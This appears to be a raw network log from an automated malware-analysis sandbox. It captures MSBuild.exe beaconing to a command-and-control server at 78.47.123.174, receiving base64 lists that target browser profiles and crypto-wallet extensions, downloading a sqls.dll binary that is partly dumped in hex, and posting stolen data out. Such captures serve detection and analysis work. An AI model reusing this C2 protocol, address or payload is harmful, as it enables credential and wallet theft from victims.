                                                                                        2024-05-24 08:27:02 UTC | 14502 | IN
                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                        2024-05-24 08:27:02 UTC | 10074 | IN
                                                                                        Data Ascii: lass="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="sub
                                                                                        2024-05-24 08:27:02 UTC | 11106 | IN
                                                                                        Data Ascii: &quot;,&quot;FROM_WEB&quot;:true,&quot;WEBSITE_ID&quot;:&quot;Community&quot;,&quot;BASE_URL_SHARED_CDN&quot;:&quot;https:\/\/shared.cloudflare.steamstatic.com\/&quot;,&quot;CLAN_CDN_ASSET_URL&quot;:&quot;https:\/\/clan.cloudflare.steamstatic.com\/&quot;,


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        1 | 192.168.2.4 | 49734 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-05-24 08:27:03 UTC | 186 | OUT | GET / HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:03 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:03 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        2 | 192.168.2.4 | 49737 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-05-24 08:27:04 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----IIECFHDBAAECAAKFHDHI
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 279
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:04 UTC | 279 | OUT
                                                                                        Data Ascii: ------IIECFHDBAAECAAKFHDHIContent-Disposition: form-data; name="hwid"10C88D2C9F933158821099-a33c7340-61ca-11ee-8c18-806e6f6e6963------IIECFHDBAAECAAKFHDHIContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------
                                                                                        2024-05-24 08:27:05 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:05 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:05 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 33 39 39 36 35 37 32 62 63 65 64 65 33 38 35 30 31 63 61 37 30 31 38 39 31 63 34 62 39 65 64 36 7c 31 7c 31 7c 31 7c 31 7c 31 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 3a1|1|1|1|3996572bcede38501ca701891c4b9ed6|1|1|1|1|1|50000|10


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        3 | 192.168.2.4 | 49740 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-05-24 08:27:05 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 331
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:05 UTC | 331 | OUT
                                                                                        Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"3996572bcede38501ca701891c4b9ed6------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------AFHDAKJKFCFBGCBGDHCBCont
                                                                                        2024-05-24 08:27:06 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:06 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:06 UTC | 1564 | IN
                                                                                        Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        4 | 192.168.2.4 | 49743 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-05-24 08:27:07 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAEC
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 331
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:07 UTC | 331 | OUT
                                                                                        Data Ascii: ------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="token"3996572bcede38501ca701891c4b9ed6------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------KEBGHCBAEGDHIDGCBAECCont
                                                                                        2024-05-24 08:27:08 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:07 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:08 UTC | 5605 | IN
                                                                                        Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        5 | 192.168.2.4 | 49744 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-05-24 08:27:08 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDG
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 332
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:08 UTC | 332 | OUT
                                                                                        Data Ascii: ------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="token"3996572bcede38501ca701891c4b9ed6------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------DAAFBAKECAEGCBFIEGDGCont
                                                                                        2024-05-24 08:27:09 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:09 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:09 UTC | 119 | IN
                                                                                        Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        6 | 192.168.2.4 | 49747 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-05-24 08:27:10 UTC | 279 | OUT | POST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----DGCAAFBFBKFIDGDHJDBK
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 6381
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:10 UTC | 6381 | OUT
                                                                                        Data Ascii: ------DGCAAFBFBKFIDGDHJDBKContent-Disposition: form-data; name="token"3996572bcede38501ca701891c4b9ed6------DGCAAFBFBKFIDGDHJDBKContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------DGCAAFBFBKFIDGDHJDBKCont
                                                                                        2024-05-24 08:27:10 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:10 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 2ok0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        7 | 192.168.2.4 | 49748 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-05-24 08:27:11 UTC | 194 | OUT | GET /sqls.dll HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:11 UTC | 248 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:11 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 2459136
                                                                                        Last-Modified: Sun, 19 May 2024 16:18:18 GMT
                                                                                        Connection: close
                                                                                        ETag: "664a264a-258600"
                                                                                        Accept-Ranges: bytes
                                                                                        2024-05-24 08:27:11 UTC | 16136 | IN
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                        2024-05-24 08:27:11 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                        Data Ascii: X~e!*FW|>|L1146
                                                                                        2024-05-24 08:27:11 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                                        Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                                                        2024-05-24 08:27:11 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                                                        Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                                                        2024-05-24 08:27:11 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                                        Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                                        2024-05-24 08:27:11 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                        Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                        2024-05-24 08:27:11 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                        Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                        2024-05-24 08:27:12 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                                        Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                                        2024-05-24 08:27:12 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                                        Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                                        2024-05-24 08:27:12 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                                        Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49751 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-24 08:27:14 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Content-Length: 4677
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-24 08:27:14 UTC | 4677 | OUT | Data Ascii:
------ECGIIIDAKJDHJKFHIEBF
Content-Disposition: form-data; name="token"

3996572bcede38501ca701891c4b9ed6
------ECGIIIDAKJDHJKFHIEBF
Content-Disposition: form-data; name="build_id"

a2e3340f7f64008401fa5787a882af45
------ECGIIIDAKJDHJKFHIEBF
Cont
2024-05-24 08:27:15 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 May 2024 08:27:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-24 08:27:15 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49752 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-24 08:27:16 UTC | 279 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIDHDGDHJEGHIDGDHCGC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Content-Length: 1529
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-24 08:27:16 UTC | 1529 | OUT | Data Ascii:
------HIDHDGDHJEGHIDGDHCGC
Content-Disposition: form-data; name="token"

3996572bcede38501ca701891c4b9ed6
------HIDHDGDHJEGHIDGDHCGC
Content-Disposition: form-data; name="build_id"

a2e3340f7f64008401fa5787a882af45
------HIDHDGDHJEGHIDGDHCGC
Cont
2024-05-24 08:27:16 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 May 2024 08:27:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-24 08:27:16 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49753 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-24 08:27:16 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-24 08:27:16 UTC | 437 | OUT | Data Ascii:
------HDAAAAFIIJDBGDGCGDAK
Content-Disposition: form-data; name="token"

3996572bcede38501ca701891c4b9ed6
------HDAAAAFIIJDBGDGCGDAK
Content-Disposition: form-data; name="build_id"

a2e3340f7f64008401fa5787a882af45
------HDAAAAFIIJDBGDGCGDAK
Cont
2024-05-24 08:27:17 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 May 2024 08:27:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-05-24 08:27:17 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49754 | 78.47.123.174 | 443 | 6712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-24 08:27:17 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIJECAEHJJJKJKFIDGCB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Host: 78.47.123.174
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-24 08:27:17 UTC | 437 | OUT | Data Ascii:
------FIJECAEHJJJKJKFIDGCB
Content-Disposition: form-data; name="token"

3996572bcede38501ca701891c4b9ed6
------FIJECAEHJJJKJKFIDGCB
Content-Disposition: form-data; name="build_id"

a2e3340f7f64008401fa5787a882af45
------FIJECAEHJJJKJKFIDGCB
Cont
2024-05-24 08:27:18 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 May 2024 08:27:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
